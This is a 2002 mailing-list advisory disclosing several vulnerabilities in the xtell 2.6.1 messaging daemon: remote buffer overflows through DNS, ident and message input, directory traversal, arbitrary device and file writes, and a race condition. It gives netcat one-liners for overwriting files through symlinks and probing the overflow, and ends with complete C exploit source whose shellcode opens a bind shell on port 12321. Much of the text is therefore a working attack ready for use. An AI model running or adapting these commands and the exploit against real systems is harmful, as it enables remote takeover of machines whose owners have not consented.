Release : 27/2/2002 Author : Spybreak (spybreakat_private) Software: xtell package Versions: 2.6.1, most of the vulnerabilities are present in all previous versions Problems: Remote execution of arbitrary code through several buffer overflows, information leakage, writing into arbitrary files with the rights of xtell. INTRO Xtell from the Debian Linux distribution is a network messaging client for sending messages to users on different computers. Xtell 2.6.1 with at least 3 remote buffer overflows, symlink bug, ".." directory traversal, file race condition (just mention some of them ...) and some "nice" extra features can be a "funny" thing on ones computer. Debian Linux distributes versions 1.91 and 2.6.1 (the latest version) but there do exist numerous versions between these two. Xtell can be run as daemon or from inetd. In the default installation it runs as 'nobody' with GID tty and listens on the port 4224 (default Xtell port). However even an ordinary user can run his own Xtell server, with his/her UID/GID of course. As the portnumber which the Xtelld listens on is fully configurable, there can be more than just one running Xtell server at the same time. Xtelld servers run by ordinary users are not so rare to see, especially on university computers without xtelld installed by admin. VULNERABILITIES Xtell 2.6.1 contains at least three remote buffer overflows. Anyone with own DNS service can remotely execute arbitrary code through a buffer overflow in the reverse resolving code in the xtelld server, with the UID xtelld runs under. Next, due to the absence of length check of the auth string obtained from the auth service, an output buffer can be overflowed. So anyone with fakeident server is able to remotely execute arbitrary code on the target system. Finally the output buffer can be overflowed by the data itself sent to the port 4224 (without playing with DNS or auth) depending on the size of the strings returned by these services without any manipulation. But playing with services gives instant results. For more see the EXPLOIT part. EXPLOIT(s) Of all of these possibilities I chose to send the exploit code through the xtelld port while setting my ident string to length of 200 characters to make it closer to the end of the output buffer (our target). The remote exploit (on the tail of this file) spawns a shell on the port 12321 with the UID/GID of the xtelld server what is nobody/tty by default. Play a little with the offset and alignment. Should be no problems to get it work. Do not forget to set your ident string. The alignment is critical as the position of the exploit code in the output buffer depends on the length of various strings in the output buffer. But even without the exploit (patched kernel, etc ...) there can be some fun with xtelld. The server (xtelld) receives strings sent by the client (xtell) in the following form: FROM:USER:TTY:MSG FROM is the sender of the message, USER is the person we want to send message, TTY is the destination tty we want our message write to, and finally MSG is our message. TTY can be max. 8 characters long. After such message an xtelld server replies with some status message to the client. Now how xtelld handles these different fields. Most interesting are the USER and TTY fields. You should supply at least USER or TTY. If you supply only USER, xtelld will send your message to the USER's tty provided he is logged in, and will search for .xtell-log file in the USER's home directory to log the message. If you supply only TTY, xtelld will send your message to that tty if it is writable by the xtelld server. If you supply both USER and TTY, xtelld first tries to write to TTY and then tries to find USER's .xtell-log file for logging. Doesn't matter if USER is a valid username on the target system. Now a funny secret. Xtelld believes that TTY is a valid tty, it simply places it under "/dev/" and tries to blindly write into it. No checks for valid tty belonging to logged in user USER. Therefore we can directly write some junk into any device under /dev, writable by xtelld (default nobody/tty). And due to a directory traversal possibility, with local access we can do: (especially interesting when xtelld run by some user) ln -s some-users-file /tmp/x echo ::../tmp/x:junk | nc localhost 4224 or with the client: xtell :../tmp/x@localhost junk Recall that TTY can be max. 8 chars long. With netcat variant we can easily control the FROM field. Why use that old-fashioned finger? Try to send a "little" longer message. When the user is logged in you'll get: $ echo :USER::`perl -e 'print "A" x 2000'`| nc victimhost 4224 200 OK, sent. 406 Ehhh, what? or 405 Cannot write to that user's tty. 406 Ehhh, what? or 404 User does not want you. 406 Ehhh, what? if he's not: 403 User is not here. 406 Ehhh, what? Provided that USER is a valid login name. Stealthy, without any logs. On the target "TTY" xtelld tries to show (besides the MSG) some info on the sender of the message - the USER field, user resolved by identd, IP or resolved FQDN. With crazy combinations of different field lengths (differ between versions) it is posible to make xtelld fail to output the senders address. In such cases xtelld outputs only the FROM : MSG fields, which can be easily manipulated.This way it is possible to quietly remotely fill with trash someones .xtell-log file, providing "null" as the TTY, to avoid output to that USER's tty, or fill the /tmp directory. There is also a race condition in checking for the regularity of the .xtell-log file ... ------------------------- snip -------------------------------- cat >xtelld261.c <<EOF #include <stdio.h> #include <unistd.h> #include <errno.h> #include <netdb.h> #include <netinet/in.h> /* * Remote exploit for Xtelld 2.6.1 and older * Spawns shell on port 12321 * Don't forget to set your identd string to 200 characters * Tested against Red Hat 7.2, 7.1; Debian Potato * (c) 2002 Spybreak (spybreakat_private) */ #define RET 0xbffff5a0 char sc[] = "\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30" "\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc" "\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4" "\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0" "\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0" "\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31" "\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d" "\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3" "\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0" "\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55" "\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3" "\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f" "\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f" "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51" "\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c" "\x32\xcd\x80"; void usage (char *exp) { fprintf (stderr, "Remote exploit for xtelld 2.6.1 and older.\n" "Spawns shell on port 12321.\n" "-- (c) 2002/2 Spybreak --\n" "Usage: %s [options] target\n", exp); fprintf (stderr, "Options: -a alignment (default 0)\n" " -o offset (default 0)\n" " -p port (default 4224)\n"); exit (-1); } int main (int argc, char **argv) { int c, s, i, size, port = 4224; int ret = RET, alignment = 0; struct sockaddr_in target; struct hostent *host; char payload[1078]; opterr = 0; while ((c = getopt (argc, argv, "a:o:p:")) != -1) switch (c) { case 'a': alignment = atoi (optarg); break; case 'o': ret += atoi (optarg); break; case 'p': port = atoi (optarg); break; default: usage (argv[0]); exit (1); } if (!argv[optind]) { puts ("no target!"); usage (argv[0]); } printf ("Using: TARGET: %s\tPORT: %d\tADDR: %x\t ALIGN: %d\n", argv[optind], port, ret, alignment); for (i = 0; i < 540; i++) payload[i] = 0x90; for (i = 540; i <= 1072; i += 4) *((int *) (payload + i)) = ret; memcpy (payload + 540, sc, sizeof (sc) - 1); memcpy (payload, "01234567890123456789::null:;-)", 30); payload[1077 + alignment] = '\n'; host = gethostbyname (argv[1]); if (host == NULL) { perror ("gethostbyname"); return (-1); } s = socket (AF_INET, SOCK_STREAM, 0); if (s < 0) { perror ("socket"); return (-1); } target.sin_family = AF_INET; target.sin_addr = *((struct in_addr *) host->h_addr); target.sin_port = htons (port); if (connect (s, (struct sockaddr *) &target, sizeof (target)) == -1) { perror ("connect"); close (s); return (-1); } size = send (s, payload + alignment, 1078, 0); if (size == -1) { perror ("send"); close (s); return (-1); } close (s); return (0); } EOF
This archive was generated by hypermail 2b30 : Thu Feb 28 2002 - 21:39:50 PST